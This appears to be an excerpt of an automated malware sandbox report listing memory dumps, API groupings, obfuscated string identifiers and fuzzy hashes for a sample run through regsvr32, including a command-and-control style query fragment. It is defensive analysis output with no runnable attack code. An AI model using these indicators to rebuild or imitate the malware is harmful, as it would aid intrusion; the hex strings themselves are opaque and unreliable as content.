                                                                                                                • f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89, xrefs: 00007FF983DB026B
                                                                                                                • 5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a, xrefs: 00007FF983DB056A
                                                                                                                • 8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123, xrefs: 00007FF983DADCB1
                                                                                                                • 99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff, xrefs: 00007FF983DAEC89
                                                                                                                • 8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207, xrefs: 00007FF983DAE6D8
                                                                                                                • 6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b, xrefs: 00007FF983DB0423
                                                                                                                • 16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874, xrefs: 00007FF983DB0124
                                                                                                                • a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32, xrefs: 00007FF983DAE97E
                                                                                                                • b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290, xrefs: 00007FF983DAF8CD
                                                                                                                • 6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f, xrefs: 00007FF983DAED6B
                                                                                                                • f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700, xrefs: 00007FF983DAD536
                                                                                                                • 23652a638c61b35ff5c0d664f45b77e574632037def9231080, xrefs: 00007FF983DAE18C
                                                                                                                • 980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1, xrefs: 00007FF983DB0195
                                                                                                                • 2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b, xrefs: 00007FF983DAE039
                                                                                                                • 194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07, xrefs: 00007FF983DAE89C
                                                                                                                • 1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7, xrefs: 00007FF983DAFC49
                                                                                                                • 5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12, xrefs: 00007FF983DB079F
                                                                                                                • bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e, xrefs: 00007FF983DAD92F
                                                                                                                • ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c24e5cbf5464cd461da, xrefs: 00007FF983DAEFA0
                                                                                                                • 3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0, xrefs: 00007FF983DAF399
                                                                                                                • 0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7, xrefs: 00007FF983DB0CEB
                                                                                                                • d29f33018596af56885209a0391cf43d81722440b5, xrefs: 00007FF983DAE667
                                                                                                                • b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb, xrefs: 00007FF983DB0B27
                                                                                                                • b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a, xrefs: 00007FF983DACAA7
                                                                                                                • fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2, xrefs: 00007FF983DAEE4D
                                                                                                                • ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef, xrefs: 00007FF983DACFC7
                                                                                                                • 44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230, xrefs: 00007FF983DADAF3
                                                                                                                • 3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b, xrefs: 00007FF983DB0C09
                                                                                                                • 54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2, xrefs: 00007FF983DAD4C5
                                                                                                                • e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f, xrefs: 00007FF983DAF9AF
                                                                                                                • b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed, xrefs: 00007FF983DADD22
                                                                                                                • 9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904, xrefs: 00007FF983DAF715
                                                                                                                • b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c, xrefs: 00007FF983DAFA91
                                                                                                                • d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983, xrefs: 00007FF983DAC95F
                                                                                                                • 594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560, xrefs: 00007FF983DAE585
                                                                                                                • c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb, xrefs: 00007FF983DB0C7A
                                                                                                                • a246aef866f9432cd611cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa, xrefs: 00007FF983DAE514
                                                                                                                • 13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07, xrefs: 00007FF983DB0DCD
                                                                                                                • 91a82fffab8959a91a27732300a81773d61b40ef25dee2254b, xrefs: 00007FF983DAF082
                                                                                                                • 6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda, xrefs: 00007FF983DAF328
                                                                                                                • e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0, xrefs: 00007FF983DADA82
                                                                                                                • 58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461, xrefs: 00007FF983DB02DC
                                                                                                                • 94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b, xrefs: 00007FF983DAC43F
                                                                                                                • 95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4, xrefs: 00007FF983DAD6FA
                                                                                                                • 6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642, xrefs: 00007FF983DAEDDC
                                                                                                                • 9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a, xrefs: 00007FF983DB0EAF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$_invalid_parameter_noinfo_noreturn$LibraryLoad$ByteCharMultiWide$ExitProcess
                                                                                                                • String ID: 022a590d2d2a261c2ff43f11893052504107314f076522501b83d9$06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5$0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371$0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997$0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7$10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861$10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204$13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07$16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874$194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07$19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0$1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78$1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7$1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69$2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3$23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c$23652a638c61b35ff5c0d664f45b77e574632037def9231080$26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f$277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23$27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7$27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f$2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488$2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b$2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214$326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d$35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b$360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91$3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0$3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b$44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230$475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923$4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc$51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5$54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2$58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461$594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560$5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12$5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a$5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2$60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c$6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642$65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148$66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f$66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201$68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03$68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046$6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda$6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84$6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18$6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b$6d079b4125d59aa358b2f5904df97d742f41aeade445$6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34$6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153$6f46400e097576c089e1826b85a329f52906284205151baf60e80608da$6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f$74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb$75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c$784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635$7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07$7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f$7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e$80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f$8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207$8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e$85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334$8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450$8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3$8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123$8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751$8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6$8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f$90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277$91a82fffab8959a91a27732300a81773d61b40ef25dee2254b$91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a$931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112$93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb$9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9$9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904$94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b$95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4$980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1$99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff$9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a$9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33$a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529$a246aef866f9432cd611cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa$a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849$a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a$a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd$a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653$a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac$a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32$ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335$ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace$adbb1de09138566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db$ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62$ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1$af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a$b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a$b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb$b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c$b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed$b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290$ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1$bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64$bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee$bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147$bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e$bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1$bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af$bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697$c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1$c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494$c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef$c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb$c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae$c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2$c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909$ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43$ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c24e5cbf5464cd461da$cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee$cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d$cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0$d29f33018596af56885209a0391cf43d81722440b5$d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce$d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4$d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983$d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7$d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd$d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee$d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57$d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3$d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea$dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1$dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581$dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb$e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c$e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0$e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f$e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b$ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef$eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae$ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0$ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3$f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312$f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89$f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5$f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e$f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7$f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a$f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700$fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2$fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df$ff37083708963434836f8f0c252e8680adff9bc9a0451464a4
                                                                                                                • API String ID: 1162954093-2434349084
                                                                                                                • Opcode ID: 787ddbc48a6b48528fe184a93433feee288d838829e6d0c4263c56063724a2ee
                                                                                                                • Instruction ID: 8dd3aaa179e2cc01a1f9e566bee556a03b543aacbbe6c2b3b2fafa4dceb21b38
                                                                                                                • Opcode Fuzzy Hash: 787ddbc48a6b48528fe184a93433feee288d838829e6d0c4263c56063724a2ee
                                                                                                                • Instruction Fuzzy Hash: DCB330A1F56A0256EE00EBE5D455BFC13A1BF41384FC81539D90EE67AAEEACF548C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseConcurrency::cancel_current_taskCreateDirectoryExitProcess
                                                                                                                • String ID: /s "$370d6e253a3a93578a1081bc37558c01722c167025728cb4506e8b5b00$384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$?$a337e267db176c5fb3deb0ceddc5345fe682342094e5fde3258f50cb66c792b97f$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f$c49ff0c512b63183b3b9933942f35f3b9767f14025f2b157b84cb6ecdc406c389a71dd4f34ecb955915b94eed958752b816acc6c0cc9917da04584c8e458693190
                                                                                                                • API String ID: 4181945512-2298773885
                                                                                                                • Opcode ID: fee4fe69c4ce4e82b81c96986d6a7cc5a9a9ef15443a013aea5037683e873e01
                                                                                                                • Instruction ID: 4fdd87200259a16db5eb820e8e092873e91201a9d5bb64b744180a3fcdcc4861
                                                                                                                • Opcode Fuzzy Hash: fee4fe69c4ce4e82b81c96986d6a7cc5a9a9ef15443a013aea5037683e873e01
                                                                                                                • Instruction Fuzzy Hash: D48254A2B1478185EF00DBB4D4847AD2361FB417A4F949239EA5D67AE9DFBCF189C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9, xrefs: 00007FF983DB7B7A
                                                                                                                • 651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef, xrefs: 00007FF983DB7A10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseCreateErrorExitHandleLastMutexProcessSleep
                                                                                                                • String ID: 651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef$842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9
                                                                                                                • API String ID: 1555049902-3969698901
                                                                                                                • Opcode ID: fc1ad2462030ac6af6ab798ba2c9c29fbfa56a2eaa562c4d946266715e059da3
                                                                                                                • Instruction ID: 7b62434556e4cfe6be49475ec9aed88bf1e4ff1f6676e65a6e14563e2c3a8cdf
                                                                                                                • Opcode Fuzzy Hash: fc1ad2462030ac6af6ab798ba2c9c29fbfa56a2eaa562c4d946266715e059da3
                                                                                                                • Instruction Fuzzy Hash: 1BD1B3A2B0464282EB04DBA4D458BAD23A1FF44794F84453DDA5EABBD9DFBCF548C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432, xrefs: 00007FF983DB73DE
                                                                                                                • b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347, xrefs: 00007FF983DB7788
                                                                                                                • 953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3, xrefs: 00007FF983DB74F7
                                                                                                                • 41352f26a97e153f7b3157b47315edb36e, xrefs: 00007FF983DB7453
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFolderPath
                                                                                                                • String ID: 41352f26a97e153f7b3157b47315edb36e$413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432$953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3$b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347
                                                                                                                • API String ID: 4036707352-3052264634
                                                                                                                • Opcode ID: 5abb4357f2a9fd7a0aa4fcb53fe3a4722edb279ad6f62a89d3a63c182062bf4f
                                                                                                                • Instruction ID: 3265e3d97d22f0ac22ab2b88b03a0f45e33776d8a4bc028a88683b1a264b692b
                                                                                                                • Opcode Fuzzy Hash: 5abb4357f2a9fd7a0aa4fcb53fe3a4722edb279ad6f62a89d3a63c182062bf4f
                                                                                                                • Instruction Fuzzy Hash: E51288A2B1478195EF00DFA4D484B9D2361FF417A8F845235EA5E5BAE9DFBCE188C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CreateDirectory
                                                                                                                • String ID: &p2=b$/?m=b&p1=$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4$c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60$flag
                                                                                                                • API String ID: 3745306311-2943265622
                                                                                                                • Opcode ID: febd2412d6c6687db0b818b4291c294bb880df6f30e85d0b4f72e77c755815f2
                                                                                                                • Instruction ID: ed717359305b115b4a8f3e9616ca09cc8f972e7c0f38b0c65efc071ba58bf892
                                                                                                                • Opcode Fuzzy Hash: febd2412d6c6687db0b818b4291c294bb880df6f30e85d0b4f72e77c755815f2
                                                                                                                • Instruction Fuzzy Hash: A002C8A2B2478185EF00DFA4D484BAD2366FB417A8F845639EA5D57AD9DFBCF148C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • h, xrefs: 00007FF983D91D49
                                                                                                                • 78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee, xrefs: 00007FF983D91AF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
